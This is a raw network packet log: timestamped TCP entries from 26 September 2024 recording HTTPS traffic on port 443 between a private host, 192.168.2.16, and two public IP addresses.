Sep 26, 2024 17:55:27.459346056 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.460762978 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.462584019 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.462625980 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.462641954 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.462655067 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.462676048 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.464131117 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.465529919 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.465596914 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.465610027 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.466222048 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.466228008 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.467240095 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:27.467263937 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:27.467287064 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.467320919 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:27.467358112 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.467370033 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.467545033 CEST	49748	443	192.168.2.16	142.250.185.142
Sep 26, 2024 17:55:27.467556953 CEST	443	49748	142.250.185.142	192.168.2.16
Sep 26, 2024 17:55:27.468641043 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.469996929 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.470053911 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.470067978 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.471162081 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.471170902 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.471827030 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.471878052 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.471885920 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.473104954 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.473206043 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.473217964 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.475763083 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.475858927 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.475868940 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.478334904 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.478394032 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.478405952 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.480726957 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.480786085 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.480796099 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.482295036 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.482345104 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.482356071 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.485223055 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.485286951 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.485300064 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.489550114 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.491194963 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.491208076 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.494930983 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.494985104 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.494997025 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.496556044 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.496597052 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.496612072 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.496623993 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.496882915 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.496890068 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.497946024 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.498076916 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.498117924 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.498125076 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.498133898 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.498176098 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.498611927 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.498660088 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.498668909 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.501061916 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.501120090 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.501132965 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.501199961 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.501235962 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.501276970 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.501283884 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.501544952 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.501869917 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.504514933 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.504568100 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.504580975 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.504678965 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.504725933 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.504730940 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.505362034 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.505409956 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.505417109 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.512835979 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.512887001 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.512917995 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.512933016 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.512993097 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.512998104 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.513099909 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.513484955 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.513494968 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.520028114 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.520098925 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.520121098 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.520137072 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.520200014 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.520232916 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.520404100 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.520464897 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.520473957 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.532341957 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.532421112 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.532429934 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.532444954 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.532490969 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.532495975 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.534899950 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.534946918 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.534959078 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.534972906 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.535016060 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.535048008 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.535182953 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.535356998 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.535412073 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.535413980 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.535427094 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.535449982 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.537983894 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.538058043 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.538072109 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.538187027 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.538228035 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.538244963 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.538250923 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.538840055 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.538846016 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.548996925 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.549037933 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.549062967 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.549083948 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.549226046 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.549280882 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.549289942 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.549335003 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.555596113 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.555705070 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.555885077 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.555918932 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.555943966 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.556025028 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.556080103 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.556090117 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.556420088 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.556711912 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.556874990 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.557010889 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.557020903 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.557164907 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.557252884 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.557320118 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.557327986 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.557368994 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.557374001 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.557493925 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.557539940 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.557544947 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.557878971 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.557919979 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.557924032 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.557934999 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.557972908 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.561781883 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.561882019 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.561928034 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.561971903 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.561985970 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.562016964 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.562035084 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.566665888 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.566724062 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.566734076 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.566752911 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.566971064 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.567017078 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.567023039 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.567029953 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.567053080 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.573152065 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.573196888 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.573216915 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.573230982 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.573411942 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.573473930 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.573487997 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.573570013 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.573613882 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.573617935 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.573947906 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.585139990 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.585226059 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.585294008 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.585319042 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.585527897 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.585567951 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.585582018 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.585588932 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.585633039 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.589365005 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.589607000 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.589643002 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.589672089 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.589677095 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.589723110 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.589776993 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.595535040 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.595577002 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.595643044 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.595650911 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.595701933 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.595701933 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.595716000 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.595753908 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.595854998 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.603854895 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.603940010 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.603956938 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.603964090 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.604010105 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.604013920 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.604273081 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.604310036 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.604326010 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.604331017 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.604377031 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.604383945 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.604567051 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.604619980 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.604624987 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.604711056 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.604762077 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.604767084 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.610941887 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.611017942 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.611023903 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.611069918 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.611118078 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.611123085 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.611253023 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.611300945 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.611305952 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.623213053 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.623289108 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.623294115 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.623409986 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.623466969 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.623471975 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.623624086 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.623678923 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.623684883 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.626115084 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.626152992 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.626180887 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.626185894 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.626231909 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.626337051 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.626399994 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.626461029 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.626465082 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.639607906 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.639683008 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.639688015 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.639892101 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.639925957 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.639940977 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.639945984 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.640002966 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.640139103 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.640208006 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.640250921 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.640256882 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.640584946 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.640618086 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.640641928 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.640646935 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.640692949 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.646469116 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.646559954 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.646609068 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.646612883 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.646883011 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.646923065 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.647136927 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.647142887 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.647214890 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.648159981 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.648288012 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.648346901 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.648355007 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.648674965 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.648715973 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.648730040 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.648735046 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.648811102 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.648938894 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.649014950 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.649053097 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.649065971 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.649070978 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.649116993 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.649225950 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.653049946 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.653126001 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.653131008 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.653172970 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.653237104 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.653240919 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.653316021 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.653352022 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.653362989 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.653367043 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.653410912 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.657464981 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.657876968 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.657932043 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.657947063 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.657952070 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.658000946 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.658004999 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.658020973 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.658078909 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.664074898 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.664179087 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.664222002 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.664233923 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.664239883 CEST	443	49727	142.250.186.132	192.168.2.16
Sep 26, 2024 17:55:27.664292097 CEST	49727	443	192.168.2.16	142.250.186.132
Sep 26, 2024 17:55:27.664341927 CEST	443	49727	142.250.186.132	192.168.2.16
